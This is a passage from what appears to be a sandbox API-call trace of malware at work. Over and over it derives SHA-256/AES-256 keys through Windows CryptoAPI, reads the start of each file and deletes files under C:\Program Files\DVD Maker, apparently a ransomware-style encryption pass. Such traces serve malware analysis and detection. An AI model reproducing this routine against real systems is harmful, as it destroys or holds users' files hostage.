lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.841] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.841] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.841] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.842] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png")) returned 0 [0145.842] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.843] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.843] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.843] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.843] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0145.843] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.845] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.845] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.845] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.847] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png")) returned 0 [0145.847] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.848] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.848] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.848] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.848] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5e02 [0145.848] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.852] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.852] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.852] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.853] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png")) returned 0 [0145.853] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.854] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.854] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.854] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.854] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb92 [0145.854] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.856] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.856] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.856] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.857] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png")) returned 0 [0145.857] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.858] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.858] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.858] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.858] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb70 [0145.858] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.860] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.860] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.860] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.861] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png")) returned 0 [0145.862] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.862] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.862] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.862] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.862] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbb8 [0145.862] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.864] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.864] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.864] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.865] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png")) returned 0 [0145.867] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0145.867] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.868] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.868] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.868] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.868] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0145.868] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.870] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.870] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.870] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.871] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png")) returned 0 [0145.872] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.872] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.872] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.872] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.872] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1928 [0145.872] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.875] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.875] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.875] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.876] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png")) returned 0 [0145.876] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.877] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.877] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.877] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.877] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb05 [0145.877] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.918] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.918] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.918] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.920] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png")) returned 0 [0145.920] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.921] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.921] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.921] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.921] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x15f4 [0145.921] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.923] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.923] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.923] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.924] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png")) returned 0 [0145.925] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.925] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.925] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.925] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.925] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0145.925] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.928] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.928] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.928] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.929] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png")) returned 0 [0145.929] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.930] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.930] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.930] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.930] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0145.930] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.932] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.932] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.932] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.933] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png")) returned 0 [0145.934] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.934] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.934] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.934] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.934] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0145.934] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.937] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.937] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.937] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.938] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png")) returned 0 [0145.939] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.939] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.939] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0145.939] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.941] CryptDestroyHash (hHash=0x284d528) returned 1 [0145.941] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.941] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.943] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png")) returned 0 [0145.959] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.960] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.960] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.960] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.960] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0145.960] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0145.997] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0145.997] CryptDestroyKey (hKey=0x284d568) returned 1 [0145.997] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0145.998] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png")) returned 0 [0145.999] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0145.999] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0145.999] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.999] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0145.999] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0145.999] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.001] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.001] CryptDestroyKey (hKey=0x284d568) returned 1 [0146.001] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.003] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png")) returned 0 [0146.003] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.004] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.004] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.004] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0146.004] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6114 [0146.004] ReadFile (in: hFile=0x42c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.019] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.019] CryptDestroyKey (hKey=0x284d568) returned 1 [0146.019] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.020] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png")) returned 0 [0146.021] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.021] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.021] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.021] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0146.021] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2fcdc [0146.021] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.033] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.033] CryptDestroyKey (hKey=0x284d568) returned 1 [0146.033] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.034] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png")) returned 0 [0146.035] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.036] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0146.036] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.036] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d5a8) returned 1 [0146.036] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0146.036] ReadFile (in: hFile=0x450, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0146.060] CryptDestroyHash (hHash=0x284d668) returned 1 [0146.060] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0146.060] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0146.062] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp")) returned 0 [0146.062] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0146.063] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, 